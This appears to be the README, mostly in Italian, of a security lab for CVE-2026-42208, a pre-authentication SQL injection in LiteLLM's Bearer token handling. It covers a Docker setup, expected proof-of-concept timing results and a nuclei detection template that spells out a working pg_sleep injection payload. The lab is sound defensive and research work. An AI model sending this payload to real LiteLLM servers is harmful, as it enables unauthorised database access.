
Un ambiente di laboratorio per riprodurre e rilevare CVE-2026-42208, una vulnerabilità critica di iniezione SQL pre-autenticazione in LiteLLM in cui token Bearer non sanitizzati raggiungono una query PostgreSQL non parametrizzata.
| Campo | Dettagli |
|---|---|
| CVE ID | CVE-2026-42208 |
| GHSA | GHSA-r75f-5x8p-qvmc |
| CVSS | 9.3 (Critical) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Versioni interessate | >= 1.81.16, < 1.83.7 |
| Corretta | v1.83.7 (query parametrizzata) |
| CWE | CWE-89 (SQL Injection) |
Vulnerable (v1.83.6):
POST /v1/chat/completions
Authorization: Bearer <payload> ← payload does NOT start with "sk-"
→ api_key.startswith("sk-") assertion fails (utils.py:1189)
→ caught by except Exception (utils.py:1560)
→ _handle_authentication_error(api_key=RAW_PAYLOAD)
→ _enrich_failure_metadata_with_key_info()
→ get_data(token=RAW_PAYLOAD, table_name="combined_view")
→ SQL: WHERE v.token = '{payload}' ← injection
Patched (v1.83.7):
Same request path, but:
→ get_data(token=hashed_token, ...)
→ SQL: WHERE v.token = $1 ← parameterized, no injection
Host Machine
├── localhost:8010 ──→ Docker: litellm-vuln (v1.83.6-nightly ⚠ VULNERABLE)
│ Docker: litellm-db-vuln (PostgreSQL 15)
└── localhost:8011 ──→ Docker: litellm-patched (v1.83.7-stable ✓ PATCHED)
Docker: litellm-db-patched (PostgreSQL 15)
| Strumento | Installazione |
|---|---|
| Docker Desktop | docker.com |
| nuclei | brew install nuclei |
| curl, python3 | preinstallati su macOS |
bash scripts/01-setup.sh
Al termine:
══════════════════════════════════════════════════════
Lab ready!
Vulnerable (v1.83.6-nightly) : http://localhost:8010
Patched (v1.83.7-stable) : http://localhost:8011
Master Key : sk-lab-master-key
Next: bash scripts/02-exploit.sh
══════════════════════════════════════════════════════
bash scripts/02-exploit.sh
Output atteso — versione vulnerabile (v1.83.6-nightly):
── Vulnerable (v1.83.6-nightly, port 8010) ──
Baseline : 0.031s
Injection : 6.062s (HTTP 401)
Delta : +6.031s
⚠ RESULT: pg_sleep fired — SQL INJECTION CONFIRMED (VULNERABLE)
Output atteso — versione corretta (v1.83.7-stable):
── Patched (v1.83.7-stable, port 8011) ──
Baseline : 0.028s
Injection : 0.029s (HTTP 401)
Delta : +0.001s
✓ RESULT: No significant delay — injection not executed (PATCHED)
# Vulnerable instance → should produce a [critical] finding
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8010
# Patched instance → should produce no findings
nuclei -t nuclei/CVE-2026-42208.yaml -u http://localhost:8011
Vulnerabile (v1.83.6-nightly):

Corretta (v1.83.7-stable):

bash scripts/99-teardown.sh
litellm-cve-2026-42208/
├── README.md
├── VULNERABILITY_ANALYSIS.md # Code-level analysis (English)
├── LAB_SETUP_GUIDE.md # Lab setup guide (English)
├── NUCLEI_TEMPLATE_GUIDE.md # Nuclei template design (English)
├── docker-compose.yaml
│
├── REPORT/ # Korean reports
│ ├── Vulnerability_Analysis_KR.md
│ ├── LAB_REPORT_KR.md
│ └── Nuclei_Template_Report_KR.md
│
├── nuclei/
│ └── CVE-2026-42208.yaml # Nuclei detection template
│
└── scripts/
├── 01-setup.sh # Start containers, create seed key
├── 02-exploit.sh # PoC: timing-based injection proof
└── 99-teardown.sh # Stop and remove all lab resources
Step 1 GET /health/liveliness
→ match "I am alive" in body
→ confirms target is a LiteLLM instance
Step 2 POST /v1/chat/completions
Authorization: Bearer ' OR (SELECT pg_sleep(6)) IS NOT NULL --
Matchers (AND — all must pass):
status == 401 eliminates 504/502 false positives
body contains "auth_error" OR "Authentication Error"
confirms LiteLLM auth path, not a proxy
duration >= 5 pg_sleep(6) fired → injection confirmed
Prevenzione dei falsi positivi:
status == 401 elimina le risposte dovute a timeout upstream (504) ed errori del gateway (502)duration >= 5 è sufficientemente alto da escludere il jitter di rete (la baseline è ≤0.5s)Avvertenza: Tutte le credenziali in questo laboratorio sono dati di test fittizi usati esclusivamente per scopi di ricerca sulla sicurezza. Non utilizzarle mai in produzione. Ottenere sempre un'autorizzazione esplicita prima di scansionare sistemi che non si possiedono.
| # | Condizione | Dettagli |
|---|
| 1 | Versione LiteLLM interessata | >= 1.81.16, < 1.83.7 |
| 2 | Backend PostgreSQL | Le distribuzioni SQLite non sono interessate |
| 3 | Nessuna autenticazione richiesta | Pre-autenticazione; nessuna credenziale necessaria |
| 4 | ≥1 riga in VerificationToken | pg_sleep viene eseguito solo per riga; tabella vuota = nessun ritardo |